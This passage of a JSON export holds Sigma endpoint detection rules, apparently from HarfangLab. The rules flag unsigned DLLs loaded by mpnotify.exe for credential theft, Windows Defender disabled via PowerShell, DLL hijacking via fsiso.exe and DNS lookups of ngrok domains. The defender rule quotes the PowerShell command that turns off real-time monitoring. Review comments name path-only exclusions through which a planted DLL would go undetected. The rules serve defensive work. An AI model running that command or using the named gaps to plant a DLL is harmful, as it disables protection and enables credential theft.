"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d48fb6b0-3f98-4577-95fe-48d2b1ed297d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093816Z",
"creation_date": "2026-03-23T11:45:34.093818Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093823Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy",
"https://docs.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nppasswordchangenotify",
"https://docs.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nplogonnotify",
"https://attack.mitre.org/techniques/T1003/"
],
"name": "t1003_mpnotify_load_unsigned_dll.yml",
"content": "title: Unsigned DLL Loaded by mpnotify.exe\nid: d48fb6b0-3f98-4577-95fe-48d2b1ed297d\ndescription: |\n Detects when an unsigned DLL is loaded by mpnotify.exe.\n This can be used by an attacker to receive notifications from winlogon.exe when a user logs in or changes password.\n Using a malicious DLL, an attacker can get access to clear text credentials.\n It is recommended to investigate the origin of the loaded DLL and to disable compromised accounts.\nreferences:\n - https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy\n - https://docs.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nppasswordchangenotify\n - https://docs.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nplogonnotify\n - https://attack.mitre.org/techniques/T1003/\ndate: 2021/03/18\nmodified: 2025/07/31\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - attack.t1078\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.DLLHijacking\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|endswith: '\\mpnotify.exe'\n filter_signed:\n Signed: 'true'\n exclusion_mpnotify:\n ImageLoaded: '?:\\Windows\\System32\\mpnotify.exe'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'mpnotify.exe'\n\n exclusion_winsxs:\n # C:\\Windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_88dcc0bf2fb1b808\\msvcr80.dll\n # C:\\Windows\\WinSxS\\amd64_microsoft.vc80.mfcloc_1fc8b3b9a1e18e3b_8.0.50727.6195_none_bc20f59b0bdd1acd\\mfc80FRA.dll\n # C:\\Windows\\WinSxS\\amd64_microsoft.vc80.mfcloc_1fc8b3b9a1e18e3b_8.0.50727.6195_none_bc20f59b0bdd1acd\\mfc80ENU.dll\n # C:\\Windows\\WinSxS\\amd64_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.6195_none_8448b2bd328df189\\mfc80u.dll\n # msvcr80.DLL is signed via catalogue.\n ImageLoaded:\n - '?:\\Windows\\winsxs\\amd64_microsoft.vc80.crt_*\\msvcr80.dll'\n # If we end up 
finding a 32 bits variant that is also unsigned, uncomment this.\n # - '?:\\windows\\winsxs\\x86_microsoft.vc80.crt_*\\msvcr80.dll'\n - '?:\\Windows\\winsxs\\amd64_microsoft.vc80.mfcloc_*\\mfc80???.dll' # mfc80ENU.dll / mfc80FRA.dll\n - '?:\\Windows\\WinSxS\\Fusion\\amd64_microsoft.vc80.mfc*\\mfc80*.dll' # mfc80FRA.dll / mfc80u.dll\n - '?:\\Windows\\winsxs\\amd64_microsoft.vc80.mfc_*\\mfc80u.dll'\n - '?:\\Windows\\winsxs\\amd64_microsoft.vc80.crt_*\\msvcp80.dll'\n - '?:\\Windows\\winsxs\\amd64_microsoft.vc90.crt_*\\msvcm90.dll'\n - '?:\\Windows\\WinSxS\\amd64_microsoft.vc80.atl_*\\ATL80.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName:\n - 'MSVCR80.DLL'\n - 'MFC80FRA.DLL'\n - 'MFC80ENU.DLL'\n - 'MFC80U.DLL'\n - 'MSVCP80.DLL'\n - 'MSVCM90.DLL'\n - 'ATL80.DLL'\n\n exclusion_ibm:\n Company: 'IBM Corporation'\n OriginalFileName:\n - 'cwbnetnt.dll' # C:\\Program Files (x86)\\IBM\\Client Access\\Shared\\cwbnetnt.dll\n - 'cwbunpls.dll' # C:\\Windows\\System32\\cwbunpls.dll\n - 'cwbcore.dll' # C:\\Windows\\System32\\cwbcore.dll\n\n exclusion_ibm_without_infos:\n # SHA-256: 5bef56d5a9196e4706f074e52f333bf357a67513a00a6882de33bfbfb77e3e1b\n ImageLoaded: '?:\\Windows\\System32\\cwbrw.dll'\n Company: ''\n Description: ''\n FileVersion: ''\n LegalCopyright: ''\n OriginalFileName: ''\n InternalName: ''\n\n # C:\\Lotus\\Notes\\npnotes64.dll\n exclusion_ibm_lotus:\n Company:\n - 'IBM Corporation'\n - 'Lotus Development'\n OriginalFileName: 'npnotes'\n\n exclusion_ibm_client_access_cwbcfmsg:\n # C:\\Program Files (x86)\\IBM\\Client Access\\Mri2928\\cwbcfmsg.dll\n # C:\\winu\\IBM\\Client Access\\MRI2966\\cwbcfmsg.dll\n # There is no PE information on this DLL...\n ImageLoaded: '*\\IBM\\Client Access\\Mri29??\\cwbcfmsg.dll'\n\n exclusion_NPPSpy:\n # This DLL is malicious so we have another sigma rule with higher level\n ImageLoaded: '?:\\Windows\\System32\\NPPSPY.dll'\n\n exclusion_mit_kerberos:\n ImageLoaded:\n - '?:\\Program Files\\MIT\\Kerberos\\bin\\krbcc64.dll'\n - 
'?:\\Program Files\\MIT\\Kerberos\\bin\\leashw64.dll'\n - '?:\\Program Files\\MIT\\Kerberos\\bin\\xpprof64.dll'\n - '?:\\Program Files\\MIT\\Kerberos\\bin\\krb5_64.dll'\n - '?:\\Program Files\\MIT\\Kerberos\\bin\\k5sprt64.dll'\n - '?:\\Program Files\\MIT\\Kerberos\\bin\\comerr64.dll'\n - '?:\\Program Files\\MIT\\Kerberos\\bin\\wshelp64.dll'\n - '?:\\Windows\\System32\\kfwlogon.dll'\n Company: 'Massachusetts Institute of Technology.'\n\n exclusion_ms:\n # Signed via catalogue\n ImageLoaded:\n - '?:\\Windows\\System32\\shfolder.dll'\n - '?:\\Windows\\System32\\comdlg32.dll'\n - '?:\\Windows\\System32\\uxtheme.dll'\n - '?:\\Windows\\System32\\oleaut32.dll'\n - '?:\\Windows\\System32\\lpk.dll'\n Company: 'Microsoft Corporation'\n\n exclusion_broadcom:\n ImageLoaded: '?:\\Windows\\System32\\BCMLogon.dll'\n Company:\n - 'Broadcom Corporation'\n - 'Dell Inc.'\n OriginalFileName: 'BCMLogon.dll'\n\n exclusion_dotnet:\n # C:\\Windows\\assembly\\NativeImages_v2.0.50727_64\\mscorlib\\0478aed7fc25ae268474c704fd2a3e0f\\mscorlib.ni.dll\n ImageLoaded: '?:\\Windows\\assembly\\NativeImages_v2*\\mscorlib\\\\*\\mscorlib.ni.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'mscorlib.dll'\n\n exclusion_secur32:\n ImageLoaded: '?:\\Windows\\System32\\secur32.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'secur32.dll'\n\n exclusion_kernel32:\n # SHA256: 3887ddbbb00e9650c5c9494b9eb5799fe0a3ea7e4d9345e596736b43f70f94da\n ImageLoaded: '?:\\Windows\\System32\\kernel32.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'kernel32'\n\n exclusion_sechost:\n # SHA256: 8ebd0bf108c490c3fb0946210a6d63767d5797e374ee5cf5414fd803d3a23451\n ImageLoaded: '?:\\Windows\\System32\\sechost.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'sechost.dll'\n\n exclusion_rpcrt4:\n # SHA256: 207227b6d01c2da123981a6f836d8f3a1c11ee52d65d15cf9ec0f3c5478abfff\n ImageLoaded: '?:\\Windows\\System32\\rpcrt4.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 
'rpcrt4.dll'\n\n exclusion_advapi32:\n # SHA256: e09740d26a0c9723de55173134dbbeb663a34085297ab14d7aeacd2bd594e55b\n ImageLoaded: '?:\\Windows\\System32\\advapi32.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'advapi32.dll'\n\n exclusion_msvcrt:\n # SHA256: 6b668a5882b862601fbe4fb2489a3b553ffdacf6d0428241b15b52fd45b88e20\n # NOTE(review): ImageLoaded previously pointed at advapi32.dll (copy-paste from the exclusion above), so this exclusion never matched; verify the SHA256 above is msvcrt.dll's\n ImageLoaded: '?:\\Windows\\System32\\msvcrt.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'msvcrt.dll'\n\n exclusion_mpr:\n # SHA256: 0f7a80db821fde6580e9481b6da44844f717ddb4983b0e3d562be43726153951\n ImageLoaded: '?:\\Windows\\System32\\mpr.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'mpr.dll'\n\n exclusion_kernelbase:\n ImageLoaded: '?:\\Windows\\System32\\KernelBase.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'Kernelbase'\n\n exclusion_xerox:\n ImageLoaded: '?:\\Program Files\\Xerox\\DSClient\\CredMan.dll'\n Company: 'Xerox Corporation'\n OriginalFileName: 'CredMan.dll'\n\n exclusion_novell:\n # NOTE(review): path-only exclusion with no publisher constraint; an unsigned DLL planted at one of these paths would be excluded\n ImageLoaded:\n - '?:\\Program Files\\Novell\\CASA\\Bin\\lcredmgr.dll'\n - '?:\\Program Files (x86)\\Novell\\ZENworks\\bin\\ZenCredManager.dll'\n\n exclusion_mcafee_enc_network_provider:\n # NOTE(review): field was 'Image' (the loading process, which the selection pins to mpnotify.exe), so this exclusion never matched; corrected to ImageLoaded. Still path-only with no publisher constraint.\n ImageLoaded: '?:\\Program Files\\Hewlett-Packard\\Drive Encryption\\EpePcNp64.dll'\n\n exclusion_rpc:\n # NOTE(review): path-only exclusion with no publisher constraint; an unsigned DLL planted at this path would be excluded\n ImageLoaded: '?:\\Windows\\System32\\RpcRtRemote.dll'\n\n exclusion_south_river_technologies:\n ImageLoaded:\n - '?:\\Windows\\System32\\wdHelper.dll'\n - '?:\\Windows\\System32\\wdResDll.dll'\n - '?:\\Windows\\System32\\wdUIResDll.dll'\n LegalCopyright|contains: 'South River Technologies, Inc.'\n\n exclusion_nvidia:\n ImageLoaded:\n - '?:\\Program Files\\NVIDIA Corporation\\coprocmanager\\nvd*.dll'\n - '?:\\Windows\\System32\\nvinitx.dll'\n Company: 'NVIDIA Corporation'\n Product: 'NVIDIA D3D shim drivers'\n\n exclusion_winspool:\n # SHA256: ad4569983410a1149ca200729766ff80eb2f342d27024d0fd90d3bf121ea1e69\n ImageLoaded: '?:\\Windows\\System32\\winspool.drv'\n Company: 'Microsoft Corporation'\n OriginalFileName: 
'winspool.drv'\n\n exclusion_dell_encryption:\n ImageLoaded|startswith: '?:\\Program Files\\Dell\\Dell Data Protection\\Encryption\\'\n Company|contains: 'The Security Division of EMC'\n OriginalFileName:\n - 'ccme_ecc_non_fips'\n - 'ccme_ecc_accel_non_fips'\n - 'ccme_base_non_fips'\n - 'ccme_ecc'\n - 'ccme_asym'\n - 'ccme_base'\n - 'ccme_aux_entropy'\n - 'ccme_error_info'\n - 'cryptocme'\n\n exclusion_openssl:\n - ImageLoaded:\n - '?:\\Windows\\System32\\libcrypto*.dll'\n - '?:\\Windows\\System32\\libssl*.dll'\n Company|startswith: 'The OpenSSL Project'\n - ImageLoaded: '?:\\Windows\\System32\\libeayX.dll'\n Company: 'The OpenSSL Project, http://www.openssl.org/'\n OriginalFileName: 'libeay32.dll'\n\n exclusion_sso_dell:\n ImageLoaded: '?:\\Windows\\System32\\pnsso.dll'\n Company: 'Dell Inc.'\n OriginalFileName: 'pnsso.dll'\n\n exclusion_sophos:\n ImageLoaded: '?:\\Windows\\System32\\hmpalert.dll'\n Company: 'Sophos Limited'\n OriginalFileName: 'hmpalert.dll'\n\n exclusion_wave:\n ImageLoaded: '?:\\Windows\\System32\\WCR10.dll'\n Company: 'Wave Systems Corp.'\n OriginalFileName: 'WCR10.dll'\n\n exclusion_dpapi:\n ImageLoaded: '?:\\Windows\\System32\\dpapi.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'dpapi.dll'\n\n exclusion_msctf:\n ImageLoaded: '?:\\Windows\\System32\\msctf.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'MSCTF.DLL'\n\n exclusion_version_ms:\n ImageLoaded: '?:\\Windows\\System32\\version.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'VERSION.DLL'\n\n exclusion_imm32:\n ImageLoaded: '?:\\Windows\\System32\\imm32.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'imm32'\n\n exclusion_crypt32:\n ImageLoaded: '?:\\Windows\\System32\\crypt32.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'CRYPT32.DLL'\n\n exclusion_cryptbase:\n ImageLoaded: '?:\\Windows\\System32\\cryptbase.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'cryptbase.dll'\n\n exclusion_msasn1:\n ImageLoaded: 
'?:\\Windows\\System32\\msasn1.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'msasn1.dll'\n\n exclusion_shell32:\n ImageLoaded: '?:\\Windows\\System32\\shell32.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'SHELL32.DLL'\n\n exclusion_avencis:\n ImageLoaded: '?:\\Program Files (x86)\\Avencis\\SSOX\\SSOXCredentialManager.dll'\n Company: 'Avencis'\n OriginalFileName: 'SSOXCredManager.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d48fb6b0-3f98-4577-95fe-48d2b1ed297d",
"rule_name": "Unsigned DLL Loaded by mpnotify.exe",
"rule_description": "Detects when an unsigned DLL is loaded by mpnotify.exe.\nThis can be used by an attacker to receive notifications from winlogon.exe when a user logs in or changes password.\nUsing a malicious DLL, an attacker can get access to clear text credentials.\nIt is recommended to investigate the origin of the loaded DLL and to disable compromised accounts.\n",
"rule_creation_date": "2021-03-18",
"rule_modified_date": "2025-07-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d4bcc870-f8ea-422b-a873-97ee79190440",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621697Z",
"creation_date": "2026-03-23T11:45:34.621699Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621703Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/",
"https://github.com/jeremybeaume/tools/blob/master/disable-defender.ps1",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_windows_defender_disable_powershell.yml",
"content": "title: Windows Defender Disabled via PowerShell\nid: d4bcc870-f8ea-422b-a873-97ee79190440\ndescription: |\n Detects the usage of PowerShell to disable Windows Defender.\n Attackers might disable Windows Defender to evade detection.\n It is recommended to investigate the PowerShell command and the parent process for suspicious activities.\nreferences:\n - https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/\n - https://github.com/jeremybeaume/tools/blob/master/disable-defender.ps1\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2023/08/24\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains:\n - 'Set-MpPreference -DisableRealtimeMonitoring 1'\n - 'Set-MpPreference -DisableRealtimeMonitoring $true'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_image:\n ProcessParentImage:\n - '?:\\Program Files\\McAfee\\Endpoint Security\\Threat Prevention\\mfetp.exe'\n - '?:\\Program Files (x86)\\Microsoft Intune Management Extension\\AgentExecutor.exe'\n - '?:\\Program Files (x86)\\N-able Technologies\\AutomationManagerAgent\\AutomationManager.AgentService.exe'\n\n exclusion_bitdefender:\n ProcessParentSigned: 'true'\n ProcessParentImage|endswith: '\\Installer.exe'\n ProcessParentSignature: 'Bitdefender SRL'\n\n exclusion_brainlab:\n ProcessOriginalFileName: 'PackageManager.exe'\n ProcessSigned: 'true'\n ProcessParentSignature: 'Brainlab AG'\n\n exclusion_ccm:\n PowershellScriptPath|startswith:\n - '?:\\WINDOWS\\CCM\\'\n - 
'?:\\Windows\\ccmcache\\'\n ProcessParentCommandLine: '?:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding'\n ProcessGrandparentCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k DcomLaunch'\n - '?:\\WINDOWS\\system32\\svchost.exe -k DcomLaunch -p'\n\n exclusion_update:\n ProcessImage: '?:\\Windows\\System32\\SIHClient.exe'\n ProcessParentImage: '?:\\Windows\\System32\\upfc.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d4bcc870-f8ea-422b-a873-97ee79190440",
"rule_name": "Windows Defender Disabled via PowerShell",
"rule_description": "Detects the usage of PowerShell to disable Windows Defender.\nAttackers might disable Windows Defender to evade detection.\nIt is recommended to investigate the PowerShell command and the parent process for suspicious activities.\n",
"rule_creation_date": "2023-08-24",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d4d6d0bc-c4fa-46f7-ab41-5e058ec48856",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076052Z",
"creation_date": "2026-03-23T11:45:34.076054Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076058Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_fsiso.yml",
"content": "title: DLL Hijacking via fsiso.exe\nid: d4d6d0bc-c4fa-46f7-ab41-5e058ec48856\ndescription: |\n Detects potential Windows DLL Hijacking via fsiso.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'fsiso.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\iumbase.DLL'\n - '\\iumsdk.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d4d6d0bc-c4fa-46f7-ab41-5e058ec48856",
"rule_name": "DLL Hijacking via fsiso.exe",
"rule_description": "Detects potential Windows DLL Hijacking via fsiso.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d4e4630d-a0c6-49fe-b595-017d9905b55d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625319Z",
"creation_date": "2026-03-23T11:45:34.625321Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625325Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/november/APT29%20attacks%20Embassies%20using%20CVE-2023-38831%20-%20report%20en.pdf",
"https://ngrok.com/blog-post/new-ngrok-domains",
"https://attack.mitre.org/techniques/T1102/002/",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1102_002_dns_resolution_ngrok.yml",
"content": "title: DNS Resolution of Ngrok Service\nid: d4e4630d-a0c6-49fe-b595-017d9905b55d\ndescription: |\n Detects a DNS resolution request to Ngrok's services by utilizing free static domains provided by Ngrok.\n Adversaries may use an existing, legitimate external Web service like Ngrok as a means to sending commands to and receiving output from a compromised system over the Web service channel.\n It is recommended to investigate the process at the origin of the DNS resolution to determine whether the communication with Ngrok's services is legitimate.\nreferences:\n - https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/november/APT29%20attacks%20Embassies%20using%20CVE-2023-38831%20-%20report%20en.pdf\n - https://ngrok.com/blog-post/new-ngrok-domains\n - https://attack.mitre.org/techniques/T1102/002/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2023/11/20\nmodified: 2025/12/19\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1102.002\n - attack.t1071.001\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Tool.Ngrok\n - classification.Windows.Behavior.NetworkActivity\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection:\n QueryName|endswith:\n - '.ngrok-free.app'\n - '.ngrok-free.dev'\n - '.ngrok.app'\n - '.ngrok.dev'\n - '.ngrok.io'\n\n filter_browser:\n ProcessOriginalFileName:\n - 'firefox.exe'\n - 'chrome.exe'\n - 'brave.exe'\n - 'msedge.exe'\n - 'librewolf.exe'\n - 'opera.exe'\n - 'vivaldi.exe'\n - 'iexplore.exe'\n - 'msedgewebview2.exe'\n - 'zen.exe'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n exclusion_misc_windows:\n ProcessImage:\n - '?:\\Windows\\System32\\PING.EXE'\n - '?:\\Windows\\SysWOW64\\PING.EXE'\n - '?:\\Windows\\System32\\ipconfig.exe'\n - 
'?:\\Windows\\SysWOW64\\ipconfig.exe'\n - '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n - '?:\\Windows\\System32\\wbem\\WmiApSrv.exe'\n - '?:\\Windows\\System32\\smartscreen.exe'\n\n exclusion_svchost:\n ProcessImage: '?:\\Windows\\System32\\svchost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_defender:\n ProcessOriginalFileName:\n - 'MsMpEng.exe'\n - 'MsSense.exe'\n - 'NisSrv.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_mcafee:\n ProcessImage|endswith: '\\mfeatp.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'MUSARUBRA US LLC'\n\n exclusion_postman:\n ProcessImage|endswith: '\\Postman.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Postman, Inc.'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\n#level: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d4e4630d-a0c6-49fe-b595-017d9905b55d",
"rule_name": "DNS Resolution of Ngrok Service",
"rule_description": "Detects a DNS resolution request to Ngrok's services by utilizing free static domains provided by Ngrok.\nAdversaries may use an existing, legitimate external Web service like Ngrok as a means of sending commands to and receiving output from a compromised system over the Web service channel.\nIt is recommended to investigate the process at the origin of the DNS resolution to determine whether the communication with Ngrok's services is legitimate.\n",
"rule_creation_date": "2023-11-20",
"rule_modified_date": "2025-12-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1102.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d4f15ea4-71e4-4670-8baf-2801a6e000e1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
